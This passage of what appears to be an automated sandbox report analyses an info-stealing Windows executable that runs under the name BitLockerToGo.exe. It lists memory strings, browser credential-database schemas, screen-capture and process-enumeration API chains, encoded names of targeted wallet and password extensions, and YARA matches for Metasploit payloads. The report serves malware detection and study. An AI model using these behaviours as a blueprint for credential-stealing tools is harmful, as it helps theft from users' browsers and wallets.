Source: BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2081688991.0000000028BF1000.00000004.00000020.00020000.00000000.sdmp, GHDHJEBFBFHJECAKFCAA.1.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: JEBFIIIE.1.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2081688991.0000000028BF1000.00000004.00000020.00020000.00000000.sdmp, GHDHJEBFBFHJECAKFCAA.1.dr String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: JEBFIIIE.1.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.1.dr String found in binary or memory: https://www.mozilla.org
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.1.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.1.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: BitLockerToGo.exe, 00000001.00000003.2001248684.0000000028EB3000.00000004.00000020.00020000.00000000.sdmp, KEHDBAEGIIIEBGCAAFHIDHDBFB.1.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.1.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: BitLockerToGo.exe, 00000001.00000003.2001248684.0000000028EB3000.00000004.00000020.00020000.00000000.sdmp, KEHDBAEGIIIEBGCAAFHIDHDBFB.1.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02769010 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 1_2_02769010

System Summary

Source: 00000000.00000002.1843071659.0000000002500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000000.00000002.1843071659.0000000002466000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000000.00000002.1843071659.000000000232E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C81ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset, 1_2_6C81ED10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C85B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 1_2_6C85B700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C85B8C0 rand_s,NtQueryVirtualMemory, 1_2_6C85B8C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C85B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 1_2_6C85B910
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C7FF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 1_2_6C7FF280
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 6C82CBE8 appears 134 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 6C8394D0 appears 90 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 027545C0 appears 317 times
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe, 00000000.00000002.1843071659.000000000223F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.1843071659.0000000002500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000000.00000002.1843071659.0000000002466000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000000.00000002.1843071659.000000000232E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Binary string: [0m[%s]%s %-44s address string too shortresource length too longunpacking Question.Classnon-empty decoder bufferencodeArray: nil elementstreamSafe was not resetmsgpack: unknown code %xflate: maxBits too largeBad 'interval' param: %s\Device\NamedPipe\cygwinrefining %#v to be > %#vrefining %#v to be < %#vNumberLowerBound for %#vNumberUpperBound for %#vLengthLowerBound for %#vLengthUpperBound for %#vchacha20: wrong key sizecould not resolve %q: %vThe string to transform.duplicate column name %qStdlen returned an errorinvalid field number: %dmismatching enum lengthsunknown extension degreeSouth Sudan Standard TimeUS Mountain Standard TimeMiddle East Standard TimeTransbaikal Standard TimeW. Mongolia Standard TimeAfghanistan Standard TimeNorth Korea Standard TimeUlaanbaatar Standard TimeVladivostok Standard TimeAUS Central Standard TimeAUS Eastern Standard TimeKaliningrad Standard TimeNew Zealand Standard Time2006-01-02T15:04:05Z07:00installation_repositoriesbloom bytes too big %d %dresource deadlock avoidedoperation now in progressno buffer space availableno such device or addresssocket type not supportedinvalid cross-device linkGetFinalPathNameByHandleWGetQueuedCompletionStatusUpdateProcThreadAttributenumber of sections is 10+LPSAFEARRAY_UserUnmarshalGetRecordInfoFromTypeInfoarray index out of bounds!#$%&'()-@^_`{}~+,.;=[]\/ARM Thumb-2 little endianMIPS little-endian WCE v2Chinese (Simplified) (zh)Mongolian (Cyrillic) (mn)Bangla Bangladesh (bn-BD)Bosnian (Latin) (bs-Latn)Central Kurdish (ku-Arab)Dari Afghanistan (prs-AF)Dutch Netherlands (nl-NL)English Australia (en-AU)English Hong Kong (en-HK)English Singapore (en-SG)French Caribbean (fr-029)French Congo, Drc (fr-CD)French Luxembourg (fr-LU)German Luxembourg (de-LU)Hungarian Hungary (hu-HU)Icelandic Iceland (is-IS)Kazakh Kazakhstan (kk-KZ)Kyrgyz Kyrgyzstan (ky-KG)Maori New Zealand (mi-NZ)Mapudungun Chile (arn-CL)Portuguese Brazil (pt-BR)Serbian (Latin) (sr-Latn)Setswana Botswana (tn-BW)Sinhala Sri Lanka (si-LK)Spanish Argentina (es-AR)Spanish Guatemala (es-GT)Spanish Nicaragua (es-NI)Tigrinya Ethiopia (ti-ET)Ukrainian Ukraine (uk-UA)Zulu South Africa (zu-ZA)` Contents are null-bytesgoroutine profile cleanupchansend: spurious wakeupruntime
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/22@0/1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C857030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 1_2_6C857030
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02769600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 1_2_02769600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02763720 CoCreateInstance,MultiByteToWideChar,lstrcpyn, 1_2_02763720
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\9GM2419D.htm
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: BitLockerToGo.exe, 00000001.00000002.2077374540.000000001CBDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084238802.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: BitLockerToGo.exe, 00000001.00000002.2077374540.000000001CBDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084238802.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: BitLockerToGo.exe, 00000001.00000002.2077374540.000000001CBDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084238802.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: BitLockerToGo.exe, 00000001.00000002.2077374540.000000001CBDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084238802.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: BitLockerToGo.exe, BitLockerToGo.exe, 00000001.00000002.2077374540.000000001CBDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084238802.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: BitLockerToGo.exe, 00000001.00000002.2077374540.000000001CBDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084238802.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: BitLockerToGo.exe, 00000001.00000002.2077374540.000000001CBDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084238802.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: BitLockerToGo.exe, 00000001.00000003.1916221843.0000000022B59000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1916221437.0000000002A70000.00000004.00000020.00020000.00000000.sdmp, IDAAKEHJDHJKEBFHJEGD.1.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: BitLockerToGo.exe, 00000001.00000002.2077374540.000000001CBDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084238802.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: BitLockerToGo.exe, 00000001.00000002.2077374540.000000001CBDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084238802.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe ReversingLabs: Detection: 52%
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Virustotal: Detection: 54%
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: $github.com/mmcloughlin/addchain/meta
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: &github.com/mmcloughlin/addchain/acc/ir
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: 'github.com/mmcloughlin/addchain/acc/ast
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: (github.com/mmcloughlin/addchain/acc/pass
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: .github.com/mmcloughlin/addchain/internal/print
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: Cgithub.com/consensys/gnark-crypto/field/generator/internal/addchain
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: depgithub.com/mmcloughlin/addchainv0.4.0h1:SobOdjm2xLj1KkXN5/n0xTIWyZA2+s99UCY1iPfkHRY=
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/bigint.Equal
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/bigint.EqualInt64
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/bigint.Pow2
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/bigint.One
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/bigint.Mask
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/bigint.Ones
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/bigints.Contains
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/bigints.Index
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Chain.Clone
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/bigints.Clone
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Chain).AppendClone
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/bigint.Clone
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Chain.End
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Chain.Ops
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Chain.Op
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Chain.Program
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/bigint.Zero
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Chain.Validate
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Chain.Produces
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Chain.Superset
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Chain.IsAscending
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Op.IsDouble
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Op.Operands
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Op.Uses
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Program).Shift
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Program).Double
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Program).Add
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Program.boundscheck
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Program.Doubles
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Program.Count
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Program.Adds
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Program.Evaluate
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.New
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Program.ReadCounts
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Program.Dependencies
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Chain).Clone
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Chain).End
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Chain).IsAscending
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Chain).Op
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Chain).Ops
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Chain).Produces
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Chain).Program
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Chain).Superset
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Chain).Validate
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Op).IsDouble
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Op).Operands
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Op).Uses
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Program).Adds
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Program).Count
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Program).Dependencies
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Program).Doubles
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Program).Evaluate
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Program).ReadCounts
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Program).AddInstruction
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Program.Output
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Program.Clone
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Instruction.Clone
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Operand.Clone
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Program.String
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Operand.String
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Instruction.Operands
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Instruction.String
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Add.Inputs
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Add.Clone
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Add.String
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Double.Inputs
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Double.Clone
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Double.String
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Shift.Inputs
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Shift.Clone
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Shift.String
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: type:.eq.github.com/mmcloughlin/addchain/acc/ir.Operand
